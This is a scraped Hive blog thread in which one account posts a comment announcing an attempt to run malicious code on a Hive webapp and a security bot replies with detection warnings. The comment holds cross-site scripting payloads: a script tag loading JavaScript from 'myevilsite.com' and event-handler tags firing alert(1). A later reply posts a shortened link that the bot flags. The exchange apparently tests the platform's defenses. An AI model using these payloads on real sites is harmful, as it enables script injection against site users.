create account

x-s-s--demo by b0t5-testing

View this thread on: hive.blogpeakd.comecency.com

Viewing a response to: @b0t5-testing/security-vulnerability-inspection

· @b0t5-testing ·
x-s-s--demo
Just trying to execute some malicious code on a targeted Hive webapp..
 <br/> <script src="https://myevilsite.com/test.js"></script>
<style onload="alert(1)"><xss id=x style="position:absolute;" onanimationcancel="alert(1)"></xss>
👎  
properties (23)
authorb0t5-testing
permlinkdemo-xss-39533453
categoryx
json_metadata{"tags":["test"],"app":"testapp"}
created2020-09-17 03:17:12
last_update2020-09-17 03:17:12
depth1
children3
last_payout2020-09-24 03:17:12
cashout_time1969-12-31 23:59:59
total_payout_value0.000 HBD
curator_payout_value0.000 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length230
author_reputation11,039,985,899
root_title"security vulnerability inspection"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id99,668,894
net_rshares-254,287,353
author_curate_reward""
vote details (1)
@keys-defender · (edited)
kid no xss
<h4>@b0t5-testing Your comment cointains some text that could be a potential attempt to inject malicious code.</h4>
  <div class="phishy">
    <p><i>Investigation in progress..</i></p>
  </div>
  Please forgive any false positives.
  <br>More info: <sub>https://hive.blog/@keys-defender/new-feature-xss-detection-on-chain</sub>
  <br><sub>Comment 1% downvoted to make it less visible. This message is self-voted to be more visible among others.</sub>
  <br><br>@keys-defender<center>https://images.hive.blog/DQmQNsbUEARNLeAYp5bvBP11LhfwwaJgvbiirM8qGx8ner4/image.png</center>
👍  
properties (23)
authorkeys-defender
permlinkantixss-keys-defender-bot-1600312635359
categoryx
json_metadata{"app":"hiveblog/0.1","users":["b0t5-testing","keys-defender"],"image":["https://images.hive.blog/DQmQNsbUEARNLeAYp5bvBP11LhfwwaJgvbiirM8qGx8ner4/image.png"],"links":["https://hive.blog/@keys-defender/new-feature-xss-detection-on-chain"]}
created2020-09-17 03:17:15
last_update2020-09-17 03:26:30
depth2
children2
last_payout2020-09-24 03:17:15
cashout_time1969-12-31 23:59:59
total_payout_value0.000 HBD
curator_payout_value0.000 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length574
author_reputation89,741,089,699,821
root_title"security vulnerability inspection"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id99,668,897
net_rshares30,378,735,287
author_curate_reward""
vote details (1)
@b0t5-testing ·
Test:
https://bit.ly/1c92v5e
properties (22)
authorb0t5-testing
permlinkqifpre
categoryx
json_metadata{"links":["https://bit.ly/1c92v5e"],"app":"hiveblog/0.1"}
created2020-10-19 05:54:51
last_update2020-10-19 05:54:51
depth3
children1
last_payout2020-10-26 05:54:51
cashout_time1969-12-31 23:59:59
total_payout_value0.000 HBD
curator_payout_value0.000 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length28
author_reputation11,039,985,899
root_title"security vulnerability inspection"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id100,161,583
net_rshares0
@keys-defender ·
kid no unsafe links
<div class="pull-right"><img src="https://cdn.steemitimages.com/DQmWTb4AjAXUxBNkiUVuTXAJeirpHgJz7Uih4rdofQe5spn/image.png"></div>
    <div class="phishy"></div> It looks like this comment contains a shortened URL. @keys-defender be careful as sometimes they can hide phishing or compromised websites.
    Here is my preview of the domain so you can decide whether you consider it safe: https://techforluddites.com
    <br>Now checking it against my database of known compromised or unsafe domains.. you'll see another reply if it's in there.
    <br><sub>For more information about risks involved in shortened URLs, read this Forbes article: https://www.forbes.com/sites/ygrauer/2016/04/20/five-reasons-you-should-stop-shortening-urls</sub>.<br><sub>This auto-reply is self-voted to be more visible among others. If this message bothers you reply OFF - (I'll still check previews against my database)</sub>
👍  
properties (23)
authorkeys-defender
permlinkantiunsafelinks-keys-defender-bot-1603086897338
categoryx
json_metadata{"tags":["unsafelinks"],"app":"hivejs/kd"}
created2020-10-19 05:55:00
last_update2020-10-19 05:55:00
depth4
children0
last_payout2020-10-26 05:55:00
cashout_time1969-12-31 23:59:59
total_payout_value0.000 HBD
curator_payout_value0.000 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length906
author_reputation89,741,089,699,821
root_title"security vulnerability inspection"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id100,161,584
net_rshares29,119,976,387
author_curate_reward""
vote details (1)